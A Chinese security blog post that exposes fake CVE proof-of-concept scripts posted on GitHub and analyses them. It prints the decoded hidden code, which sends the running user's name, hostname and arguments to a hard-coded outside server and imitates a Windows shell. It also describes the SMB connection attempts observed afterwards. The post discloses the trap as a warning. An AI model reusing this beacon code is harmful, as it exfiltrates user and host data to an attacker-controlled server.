揭露 | 国产老硬币l33terman6000的骚操作

0x01 事件起因

昨天早上9点左右逛github时，我发现l33terman6000一次性放出了最近热门的7个漏洞的poc。

0x02 事件经过

兴奋地尝试CVE-2020-0796之后发现，好像可以啊！

仔细一看我发现7个脚本中shellcode完全一样。

Shellcode解码看看。

得到了如下代码：

time.sleep(3)
lhost = os.uname()[1]
command = getpass.getuser() + '@' + (lhost)
args = ' '.join(sys.argv[1:])
ErrorMsg = 'Connection Terminated: (Timeout)'
URL = http://54.184.20.69/poc2.php
PARAMS = {'host':command, 'args':args, 'cve':Bug}
r = requests.get(url = URL, params = PARAMS)
welcome = r.content
if welcome != "":
        rsp = 1
        while rsp != "":
                cmd = raw_input(welcome)
                PARAMS = {'host':command, 'args':cmd, 'cve':Bug}
                r = requests.get(url = URL, params = PARAMS)
                rsp = r.content
                print rsp
                welcome = "C:\WINDOWS\system32>"
time.sleep(10)

发送参数给54.184.20.69/poc2.php， 做的全是和poc2的交互，相当于poc2.php做了http代理。

敲ipconfig之后返回的IP信息在54.184.20.69/ip.txt，其实都是他设置好的。

经过尝试，发现执行dir，whoami，ipconfig都会返回他设置的信息，如果执行其他命令如：ver，shell就会断开。

我是在本地执行的，由于他的poc无法打到我的内网，导致poc2.php中的”真poc”没有触发。于是我在Ubuntu vps上进行实验监听了445端口，还真来东西了。

抓包看看，120.244.60.215来了一堆SMB2请求包，和Ubuntu协商SMB失败。

之后转发内网win10 445端口到Ubuntu vps的445端口，因为他只会访问445端口，怀疑有真CVE-2020-0796poc，之后开始抓poc。

然后我再用假poc去打公网的SMB服务时，执行ipconfig会返回vps地址，网关都换成117.51.142.1，相当逼真。

然后分析SMB流量。

第一个包：协商SMB版本 第二个包：尝试用户名为.密码为空登录 第三个包：尝试对192.168.0.18\IPC$连接 第四个包：再次协商SMB版本 第五个包：尝试SMB匿名登录尝试 第六个包：尝试对192.168.56.20\IPC$连接 怀疑是等待时间太短，之后尝试等待30分钟，vps445端口大概20分钟没流量之后关闭了连接。

可以看到又新增了二个ip来访问SMB，不过还是相同的六次请求，2次实验，共来四个不同ip进行访问，每次指定两个ip去进行IPC$连接。其中发现一个公网ip，其他都是内网ip。

公网ip 62.234.15.3 并没有开SMB服务。

telnet公网ip之后，越来越和poc没有关系了。。。

0x03 最终结论

1、两次使用poc对比

内网使用poc打的话，会返回他设置的54.184.20.69的信息，和你的win10靶机没有任何关系。 公网使用poc打的话，两次实验，共发现4个ip来对靶机进行SMB访问，全是国内ip，每次尝试对两个地址尝试IPC$连接和匿名登录。